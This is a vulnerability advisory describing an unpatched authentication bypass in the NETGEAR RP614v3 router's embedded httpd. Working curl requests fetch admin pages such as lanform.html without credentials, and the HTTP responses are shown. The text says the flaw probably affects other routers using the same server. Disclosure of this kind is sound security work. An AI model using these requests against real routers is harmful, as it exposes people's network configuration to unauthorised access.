###########################################
Vendor : NETGEAR
Product : RP614v3
informed on : 12. 10. 2015
responded : no
fixed : no
Effect : Remotely exploitable over LAN/WLAN
Typ : Authentication Bypass
Difficulty : trivial
###########################################
The N300 FW authentication bypass inspired me to check my rp614v3 router
and I found this bypass:
Firmware: *Firmwareversion* V6.0GR Oct 26 2004 ( which seems to be the
lastest )
It's an old model, but it's still in operation with ADSL2 connections
like TCOM DSL6000 in Germany.
How it works:
If you use a normal browser, it sends a *HEAD*, followed by a GET, to
the router first, which gets a 403 Forbidden back:
# curl -I "http://192.168.1.1/contents1.html"
HTTP/1.0 403 Forbidden
this was expected and is the valid answere, but if you send a *GET*
instead of the HEAD and your not authenticated,
you get the 200 back :
# curl -i "http://192.168.1.1/contents1.html"
HTTP/1.0 200 OK
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
Content-length: 7158
Accept-ranges: bytes
Content-type: text/html
...
Works for every page, with all informations disclosed the router has to
offer. No password nor a username needed.
Example :
#curl -i "http://192.168.1.1/lanform.html"
HTTP/1.0 200 OK
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
Content-length: 13722
Accept-ranges: bytes
Content-type: text/html
....
(all ips and mac have been changed )
Sidenote:
As it's a problem of the underlying httpd server from "Delta Networks
Inc." , it's most likely to be effecting all dsl router products using
that same version of the httpd.